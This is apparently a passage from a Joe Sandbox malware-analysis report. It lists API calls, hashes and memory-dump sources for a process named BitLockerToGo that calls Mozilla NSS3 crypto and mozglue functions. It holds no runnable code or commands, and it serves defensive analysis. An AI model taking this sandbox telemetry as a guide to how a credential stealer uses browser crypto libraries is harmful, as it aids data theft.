                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3388019835-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 15d3143648a93f8a6ea9a39fe0f4470a7181c4c78855533f193a704dcbcdf311
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ae99fcfd8e42f3d82a06b45a49fbf49430a2ae8492d9c0f12af73b841b044839
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15d3143648a93f8a6ea9a39fe0f4470a7181c4c78855533f193a704dcbcdf311
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73416DB5A19A558FCB00AFBDE08455DBBB4BF05318F094A69D8989BB00E730D8D5CB81
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C973284,?,?,6C9956F6), ref: 6C973492
                                                                                                                                                                                                                                                                                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C973284,?,?,6C9956F6), ref: 6C9734A9
                                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C973284,?,?,6C9956F6), ref: 6C9734EF
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C97350E
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C973522
                                                                                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C973552
                                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C973284,?,?,6C9956F6), ref: 6C97357C
                                                                                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C973284,?,?,6C9956F6), ref: 6C973592
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB89: EnterCriticalSection.KERNEL32(6C9FE370,?,?,?,6C9734DE,6C9FF6CC,?,?,?,?,?,?,?,6C973284), ref: 6C9AAB94
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB89: LeaveCriticalSection.KERNEL32(6C9FE370,?,6C9734DE,6C9FF6CC,?,?,?,?,?,?,?,6C973284,?,?,6C9956F6), ref: 6C9AABD1
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                                                                                                                                                                                    • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                                                                                                                                                                                    • API String ID: 3634367004-706389432
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ad243b288cc2aba9a48489a379b97855dd508fcbabf96b7403cb3293a2dd96c8
                                                                                                                                                                                                                                                                                                                    • Instruction ID: d6d2be7c827657bc3e1cd9d43eaf4567ca8d79e2885430ec49ecf6ae823f32d9
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad243b288cc2aba9a48489a379b97855dd508fcbabf96b7403cb3293a2dd96c8
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C31E271B052099BDF10DFB9E848AAE77B9FB86309F200019E525E3650EB71E905CFA0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CADDE64), ref: 6CADED0C
                                                                                                                                                                                                                                                                                                                    • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CADED22
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBC18D0,?), ref: 6CAEB095
                                                                                                                                                                                                                                                                                                                    • PL_FreeArenaPool.NSS3(?), ref: 6CADED4A
                                                                                                                                                                                                                                                                                                                    • PL_FinishArenaPool.NSS3(?), ref: 6CADED6B
                                                                                                                                                                                                                                                                                                                    • PR_CallOnce.NSS3(6CBF2AA4,6CAF12D0), ref: 6CADED38
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA14C70: TlsGetValue.KERNEL32(?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14C97
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA14C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14CB0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA14C70: PR_Unlock.NSS3(?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14CC9
                                                                                                                                                                                                                                                                                                                    • SECOID_FindOID_Util.NSS3(?), ref: 6CADED52
                                                                                                                                                                                                                                                                                                                    • PR_CallOnce.NSS3(6CBF2AA4,6CAF12D0), ref: 6CADED83
                                                                                                                                                                                                                                                                                                                    • PL_FreeArenaPool.NSS3(?), ref: 6CADED95
                                                                                                                                                                                                                                                                                                                    • PL_FinishArenaPool.NSS3(?), ref: 6CADED9D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CAF127C,00000000,00000000,00000000), ref: 6CAF650E
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                                                                                                                                                                    • String ID: security
                                                                                                                                                                                                                                                                                                                    • API String ID: 3323615905-3315324353
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_LogPrint.NSS3(Aborting,?,6CA82357), ref: 6CBA0EB8
                                                                                                                                                                                                                                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CA82357), ref: 6CBA0EC0
                                                                                                                                                                                                                                                                                                                    • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CBA0EE6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: PR_Now.NSS3 ref: 6CBA0A22
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CBA0A35
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CBA0A66
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: PR_GetCurrentThread.NSS3 ref: 6CBA0A70
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CBA0A9D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CBA0AC8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: PR_vsmprintf.NSS3(?,?), ref: 6CBA0AE8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: EnterCriticalSection.KERNEL32(?), ref: 6CBA0B19
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CBA0B48
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CBA0C76
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: PR_LogFlush.NSS3 ref: 6CBA0C7E
                                                                                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CBA0EFA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA8AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CA8AF0E
                                                                                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBA0F16
                                                                                                                                                                                                                                                                                                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBA0F1C
                                                                                                                                                                                                                                                                                                                    • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBA0F25
                                                                                                                                                                                                                                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBA0F2B
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                                                                                                                                                                                                                                                    • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                                                                                                                                    • API String ID: 3905088656-1374795319
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PORT_NewArena_Util.NSS3(00000400), ref: 6CB04DCB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA987ED,00000800,6CA8EF74,00000000), ref: 6CAF1000
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0FF0: PR_NewLock.NSS3(?,00000800,6CA8EF74,00000000), ref: 6CAF1016
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA987ED,00000008,?,00000800,6CA8EF74,00000000), ref: 6CAF102B
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CB04DE1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF10F3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: EnterCriticalSection.KERNEL32(?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF110C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1141
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PR_Unlock.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1182
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF119C
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CB04DFF
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB04E59
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFAB0: free.MOZGLUE(?,-00000001,?,?,6CA8F673,00000000,00000000), ref: 6CAEFAC7
                                                                                                                                                                                                                                                                                                                    • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBC300C,00000000), ref: 6CB04EB8
                                                                                                                                                                                                                                                                                                                    • SECOID_FindOID_Util.NSS3(?), ref: 6CB04EFF
                                                                                                                                                                                                                                                                                                                    • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CB04F56
                                                                                                                                                                                                                                                                                                                    • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB0521A
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1025791883-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$moz_xmalloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3009372454-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • SECOID_GetAlgorithmTag_Util.NSS3(6CB02C2A), ref: 6CB00C81
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEBE30: SECOID_FindOID_Util.NSS3(6CAA311B,00000000,?,6CAA311B,?), ref: 6CAEBE44
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD8500: SECOID_GetAlgorithmTag_Util.NSS3(6CAD95DC,00000000,00000000,00000000,?,6CAD95DC,00000000,00000000,?,6CAB7F4A,00000000,?,00000000,00000000), ref: 6CAD8517
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB00CC4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFAB0: free.MOZGLUE(?,-00000001,?,?,6CA8F673,00000000,00000000), ref: 6CAEFAC7
                                                                                                                                                                                                                                                                                                                    • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CB00CD5
                                                                                                                                                                                                                                                                                                                    • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CB00D1D
                                                                                                                                                                                                                                                                                                                    • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CB00D3B
                                                                                                                                                                                                                                                                                                                    • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CB00D7D
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CB00DB5
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB00DC1
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CB00DF7
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB00E05
                                                                                                                                                                                                                                                                                                                    • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CB00E0F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CAB7F4A,00000000,?,00000000,00000000), ref: 6CAD95E0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CAB7F4A,00000000,?,00000000,00000000), ref: 6CAD95F5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CAD9609
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAD961D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD95C0: PK11_GetInternalSlot.NSS3 ref: 6CAD970B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CAD9756
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD95C0: PK11_GetIVLength.NSS3(?), ref: 6CAD9767
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CAD977E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAD978E
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3136566230-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1192971331-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • SECITEM_ArenaDupItem_Util.NSS3(?,6CA97D8F,6CA97D8F,?,?), ref: 6CA96DC8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CAEFE08
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CAEFE1D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CAEFE62
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CA97D8F,?,?), ref: 6CA96DD5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF10F3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: EnterCriticalSection.KERNEL32(?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF110C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1141
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PR_Unlock.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1182
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF119C
                                                                                                                                                                                                                                                                                                                    • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBB8FA0,00000000,?,?,?,?,6CA97D8F,?,?), ref: 6CA96DF7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBC18D0,?), ref: 6CAEB095
                                                                                                                                                                                                                                                                                                                    • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CA96E35
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CAEFE29
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CAEFE3D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CAEFE6F
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CA96E4C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PL_ArenaAllocate.NSS3(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF116E
                                                                                                                                                                                                                                                                                                                    • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBB8FE0,00000000), ref: 6CA96E82
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA96AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CA9B21D,00000000,00000000,6CA9B219,?,6CA96BFB,00000000,?,00000000,00000000,?,?,?,6CA9B21D), ref: 6CA96B01
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA96AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CA96B8A
                                                                                                                                                                                                                                                                                                                    • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CA96F1E
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CA96F35
                                                                                                                                                                                                                                                                                                                    • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBB8FE0,00000000), ref: 6CA96F6B
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000,6CA97D8F,?,?), ref: 6CA96FE1
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 587344769-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAE10
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAE24
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,?,6CABD079,00000000,00000001), ref: 6CADAE5A
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAE6F
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(85145F8B,?,?,?,?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAE7F
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAEB1
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAEC9
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAEF1
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(6CABCDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CABCDBB,?), ref: 6CADAF0B
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAF30
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 161582014-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4e73ca159282f188fa1ceffff0500e2d846f7f0ecd97625c4a3bc5f231fc56d8
